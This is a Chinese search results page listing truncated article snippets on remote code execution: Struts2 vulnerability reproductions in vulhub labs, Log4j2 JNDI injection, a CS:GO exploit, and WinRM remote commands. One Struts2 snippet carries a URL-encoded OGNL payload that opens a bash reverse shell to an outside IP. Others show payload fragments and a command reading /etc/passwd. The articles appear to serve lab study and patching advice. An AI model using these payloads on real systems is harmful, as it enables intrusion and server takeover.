首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏技术杂记

    可靠的远程代码执行(2)

    尽管 CS:GO 代码Content-Length由于其区分大小写的搜索而错过了第二个标头,并且仍然需要1337正文数据字节,但 cURL 使用最后一个标头并立即完成请求。 CS:GO 代码然后将分配的缓冲区以及缓冲区中包含的所有未初始化的内存内容(包括指针)写入磁盘。 它的定义如下: message CNETMsg_File { optional int32 transfer_id = 1; optional string file_name = 2; optional 消息通知客户端: message CMsg_CVars { message CVar { optional string name = 1; optional string value = 2; 下面是OOB访问发生的代码的反编译作为提醒: [reversed5.png] 由于数组和所有ConVars都位于 的.data部分engine.dll,我们可以可靠地设置player_slot参数,使得

    3.8K100发布于 2021-07-09
  • 来自专栏LuckySec网络安全

    S2-001远程代码执行复现

    vulhub官网地址:https://vulhub.org cd vulhub/struts2/s2-001 docker-compose build docker-compose up -d 0x03 漏洞检测 Struts2 漏洞检测工具 https://github.com/HatBoy/Struts2-Scan 使用工具检测 s2-001 漏洞 python3 Struts2Scan.py org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2. new java.lang.String[]{"pwd"} 命令+参数格式:new java.lang.String[]{"cat","/etc/passwd"} 只需要在以下payload中找到上述代码 s2-001/README.zh-cn.md

    947100编辑于 2022-11-02
  • 来自专栏LuckySec网络安全

    S2-009远程代码执行复现

    0x01 漏洞简介 Struts2对S2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;后来Struts2对S2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线 vulhub官网地址:https://vulhub.org cd vulhub/struts2/s2-009 docker-compose build docker-compose up -d 0x03 漏洞检测 Struts2 漏洞检测工具 https://github.com/HatBoy/Struts2-Scan 使用工具检测 s2-009 漏洞 python3 Struts2Scan.py 23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2. s2-001/README.zh-cn.md

    69750编辑于 2022-11-02
  • 来自专栏安全学习

    S2-001 远程代码执行漏洞

    %27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23a%3D%28new%20java.lang.ProcessBuilder username=admin&password=%25%7B%28%23cmd%3D%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.146.158%2F9999% 200%3E%261%27%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin% 23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28% 23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter

    53220编辑于 2022-12-22
  • 来自专栏LuckySec网络安全

    S2-007远程代码执行复现

    0x01 漏洞简介 S2-007漏洞一般出现在表单处。 vulhub官网地址:https://vulhub.org cd vulhub/struts2/s2-007 docker-compose build docker-compose up -d 0x03 0x04 漏洞利用 直接在年龄age框输入输入要执行的任意代码的EXP,点击登陆提交,页面会返回响应的执行结果。 如果执行结果返回的内容太多,可以通过查看网页源代码进行查看。 s2-007/README.zh-cn.md

    86520编辑于 2022-11-02
  • 来自专栏FreeBuf

    Struts2 s2-032远程代码执行分析

    介绍 Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。 Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与 ServletAPI完全脱离开,所以Struts 2可以理解为WebWork的更新产品。 虽然从Struts 1到Struts 2有着太大的变化,但是相对于WebWork,Struts 2的变化很小。 4月15号安恒安全研究院在Struts 2上发现了一个严重的远程代码执行漏洞(CVE-2016-3081) ? 2. 漏洞分析 前提:开启动态方法调用。

    72160发布于 2018-02-08
  • 来自专栏安恒信息

    Struts2 s2-032远程代码执行分析

    介绍: Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。 Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与 ServletAPI完全脱离开,所以Struts 2可以理解为WebWork的更新产品。 虽然从Struts 1到Struts 2有着太大的变化,但是相对于WebWork,Struts 2的变化很小。 4月15号安恒安全研究院在Struts 2上发现了一个严重的远程代码执行漏洞(CVE-2016-3081) ? 2. 漏洞分析 前提:开启动态方法调用。 ?

    1.2K60发布于 2018-04-11
  • 来自专栏Windows技术交流

    winrm不指定端口远程可执行命令

    远程攻击的手法应该比较多,有的不需要指定远程端口,只要remote desktop services是监听的,就能一直攻击 我知道这种就是(无需指定端口),例如 wmic /node:"IP" /USER ,也不能躲避这种攻击,因此,要加强安全设置:①修改远程端口②在安全组放行新的远程端口并限定客户端IP。 对服务端机器(被远程的机器),除过termservice服务正常运行、远程端口正常监听外,还要额外以管理员身份执行一句powershell命令: winrm quickconfig -q 2>&1> $ 以下代码兼容server2008r2/2012r2/2016/2019/2022 对客户端机器,如果5985端口不在会报错 powershell命令: reg delete "HKLM\SOFTWARE -Force 如果上面这段代码配置winrm报错-2147024894 0x80070002就是得装补丁,参考我整理的文档https://cloud.tencent.com/developer/article

    2K60编辑于 2024-09-14
  • 来自专栏HACK学习

    【漏洞预警】S2-057远程代码执行

    Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。 新漏洞刚被发现发布时,对很多企业网络来说可能是最危险的时刻,应对不及时而造成的危害可能是巨大的,特别是像Struts2 S2-057这样会搞死人的漏洞,显然黑客对他们的关注度比很多企业的安管人员要高的多 S2-057远程代码执行 漏洞简介 当namespace没有为基础xml配置中定义的结果设置值时,可以执行RCE攻击,同时,其上部操作配置没有或通配符namespace。 漏洞详情 l 危害等级:高危 l CVE编号:CVE-2018-5390 l 漏洞类型:远程代码执行 影响范围 Struts 2.3 - Struts 2.3.34 Struts 2.5 - Struts 2.5.16 处置建议 1.升级到Struts 2.3.35或Struts 2.5.17 2.临时解决方案: 验证您是否已namespace为基础xml配置中的所有已定义结果设置(并且始终不会忘记设置

    46320发布于 2019-08-07
  • 来自专栏尚国

    S2-057远程代码执行漏洞复现过程

    0x01 搭建环境docker https://github.com/vulhub/vulhub/tree/master/struts2/s2-048 docker-compose up -d 0x02 0x04 重启服务,st2-057搭建完成 ✘ ⚡ root@HK  ~/vulhub/struts2/s2-048   master ●  docker-compose up -d Starting s2-048_struts2_1 ... done ⚡ root@HK  ~/vulhub/struts2/s2-048   master ●  ? :8080/struts2-showcase/222/register2.action ? (%23b)%2c%23d%3dnew+char%5b51020%5d%2c%23c.read(%23d)%2c%23jas502n%3d+%40org.apache.struts2.ServletActionContext

    2.1K30发布于 2018-09-11
  • 来自专栏安全小圈

    Apache Struts2--061远程代码执行漏洞复现

    Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞,开发人员使用了 %{…} 语法,从而攻击者可以通过构Payload,从而造成远程代码执行。 该漏洞编号为 CVE-2020-17530 ,漏洞等级:高危 ,漏洞评分:7.5 S2-061是对S2-059沙盒进行的绕过! 0x01影响版本 Apache Struts2:2.0.0 - 2.5.25 0x02漏洞复现 漏洞项目 https://github.com/vulhub/vulhub/tree/master/struts2 2、访问漏洞环境 ? 3、测试漏洞是否存在 %25%7b+%27yunzui%27+%2b+(520+%2b+520).toString()%7d ? id=%25%7b+%27yunzui%27+%2b+(520+%2b+520).toString()%7d ?

    1.4K10发布于 2020-12-29
  • 来自专栏安恒信息

    安全通告 | S2-053远程代码执行漏洞

    安全通告 S2-053远程代码执行漏洞 1. 漏洞描述 (S2-053/CVE-2017-12611) Struts2 REST插件存在远程代码执行漏洞,开发人员在使用表达式文本或Freemarker标签强制表达式和使用要求的值可能会导致远程代码执行攻击 2. 危害等级 中危 3. 影响范围 Struts 2.0.1 - Struts 2.3.33 Struts 2.5 - Struts 2.5.10 4. 利用方式 远程利用 5. 开发人员应避免在Freemarker的结构代码中使用可写的属性,或者使用只读属性来初始化value属性(仅限getter属性)。 2. 虽然S2-053的漏洞利用代码暂未公开,但最近的S2-052的漏洞利用代码已经公开,强烈建议更新到最新版本或使用WAF等措施缓解威胁。 - END -

    89460发布于 2018-04-10
  • 来自专栏安恒信息

    s2-029 Apache Struts2 标签远程代码执行分析

    >>>> 标签介绍 Struts2标签库提供了主题、模板支持,极大地简化了视图页面的编写,而且,struts2的主题、模板都提供了很好的扩展性。实现了更好的代码复用。 Struts2的标签库有一个巨大的改进之处,struts2标签库的标签不依赖于任何表现层技术,也就是说strtus2提供了大部分标签,可以在各种表现技术中使用。 >>>> 漏洞分析 s2-029没有漏洞细节,但通过分析源码已重现漏洞。 多个标签存在问题,在i18n,text等标签(可能还存在其他标签)的name属性处理的时候会经过两次ognl执行,从而导致远程代码执行。 :i18n> <s:text name="%{#request.lan}">xxxxx</s:text> 上面两个标签name属性都存在问题 下面对i18n标签做分析 跟踪i18n标签name属性在代码中的处理

    1.3K60发布于 2018-04-11
  • 来自专栏CodeWwang

    Apache Log4j2远程代码执行漏洞

    漏洞原理 Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。 漏洞详情 Apache Log4j 远程代码执行漏洞 严重程度: 严重由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。 Apache Log4j2是Log4j的升级版本,通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。 2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。 由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限

    49630编辑于 2022-08-24
  • 来自专栏nginx遇上redis

    Apache Log4j 2远程代码执行漏洞

    该项目在Apache接手后进行了代码重构,解决了框架中的架构问题并在Log4j 2中提供了一个插件架构,这使其更具扩展性。 在进行递归查询时,JNDI方法在处理查询参数的过程中存在注入漏洞,攻击者可利用该漏洞在未授权的情况下,构造恶意参数以远程方式在目标服务器上执行恶意代码。 漏洞分析 在受影响版本中,攻击者可以利用该漏洞在未授权的情况下,构造恶意参数以远程方式在目标服务器上执行恶意代码,从而获取目标服务器的控制权限。 该漏洞以及已公开的POC进行分析,在Log4j 2组件的版本低于2.15 RC2的情况下均能成功执行任意代码,通过POC可以成功获得受害服务器返回的连接。 也可以通过查看内部JAVA源代码库中所引入的组件清单列表来确认是否引入了Apache Log4j 2.x的Jar包。

    87330编辑于 2021-12-13
  • 来自专栏安恒信息

    重磅 | Struts2 S2-048远程代码执行漏洞分析报告

    Struts2 S2-048 远程代码执行漏洞分析报告 安全通告 尊敬的客户: 2017年7月7日,Struts2官方公布最新的Struts2远程代码执行漏洞S2-048,在一定条件下,该漏洞允许攻击者远程执行代码 网站安全监测平台、Web应用弱点扫描器、远程安全评估系统和等级保护安全检查工具箱也已升级,可以检测该漏洞,建议上述产品用户尽快将规则库升级到最新版本。 漏洞描述 Struts2 是 Apache 软件基金会负责维护的一个基于MVC设计模式的 Web 应用框架开源项目。 对象的内容,直接返回给用户,则可能产生远程代码执行漏洞。 漏洞自查 用户可通过以下方法进行漏洞自查: 在请求参数中加入如下代码 ${#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse

    1.5K80发布于 2018-04-11
  • 来自专栏红队蓝军

    S2-061 Struts2远程代码执行漏洞复现 (POC详解)

    什么是Struts2 Struts2是一个用Java编写的开源MVC Web应用框架,Struts也是一个中间件,它可以连接不同的系统和服务。 2框架的OGNL表达式注入漏洞,执行任意命令或代码。 获得目标服务器的权限,实现远程代码执行攻击。 这些OGNL表达式可以执行任意的 Java代码,包括读取、修改或删除应用程序中的数据,甚至执行系统命令。 漏洞利用流程: 用户访问受影响的Struts 2应用。 如果表达式被设计用于执行恶意代码,攻击者构造特定的请求,包含恶意OGNL表达式。 应用执行表达式,导致远程代码执行漏洞。

    2.5K10编辑于 2024-07-02
  • 来自专栏ChaMd5安全团队

    Struts2远程代码执行漏洞S2-052 复现&防御方案

    0x00 前言 2017年9月5日晚间,Apache官方发布Struts 2紧急漏洞公告(S2-052), https://cwiki.apache.org/confluence/display/WW /S2-052,漏洞编号为CVE-2017-9805,因为Struts2 REST插件的XStream组件存在反序列化漏洞,导致远程代码执行。 下载完成之后,解压压缩文件,将其中app目录下的struts2-rest-showcase.war文件放到tomcat的webapps目录下。 2. 访问浏览器http://127.0.0.1:8080/struts2-rest-showcase/页面,会显示图中的页面,选择一个ID,点击编辑。 ? 3. 0x02 防御方案 方案一 升级Struts到2.5.13最新版本 方案二 .如果系统没有使用Struts REST插件,那么可以直接删除Struts REST插件,或者在配置文件中加入如下代码,限制服务端文件的扩展名

    1.5K90发布于 2018-03-29
  • 来自专栏FreeBuf

    S2-029 Struts2 标签远程代码执行分析(含POC)

    0x00 标签介绍 Struts2标签库提供了主题、模板支持,极大地简化了视图页面的编写,而且,struts2的主题、模板都提供了很好的扩展性。实现了更好的代码复用。 Struts2的标签库有一个巨大的改进之处,struts2标签库的标签不依赖于任何表现层技术,也就是说 strtus2提供了大部分标签,可以在各种表现技术中使用。 0x01 漏洞分析 struts2的i18n,text标签的 name属性处理的时候会经过两次ognl执行,从而导致远程代码执行。 标签使用如下所示: ? 上面两个标签name属性都存在问题 下面对i18n标签做分析 跟踪i18n标签name 属性在代码中的处理: ? 然后将name值传入下面一行代码执行ognl, 其中ognl表达式为: ? 从而导致命令执行在/tmp目录下生成dbapptest 文件。

    1.5K80发布于 2018-02-07
  • 来自专栏LMC的摸鱼博客

    Apache Log4j 2 远程代码执行漏洞详解

    Post Views: 573 Apache Log4j 2 远程代码执行漏洞详解 2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。 Apache Log4j2 远程代码执行漏洞的详细信息已被披露,而经过分析,本次 Apache Log4j 远程代码执行漏洞,正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记入日志时 ,攻击者通过构造特殊请求,来触发 Apache Log4j2 中的远程代码执行漏洞,从而利用此漏洞在目标服务器上执行任意代码。 ,攻击者可以通过JNDI来执行LDAP协议来注入一些非法的可执行代码2.漏洞处理 漏洞评级 CVE-2021-44228 Apache Log4j 远程代码执行漏洞 严重 影响版本 Apache Log4j 2.x < 2.15.0 2.1 内部自查 2.1.1 项目依赖版本检测

    1.4K30编辑于 2022-08-09
领券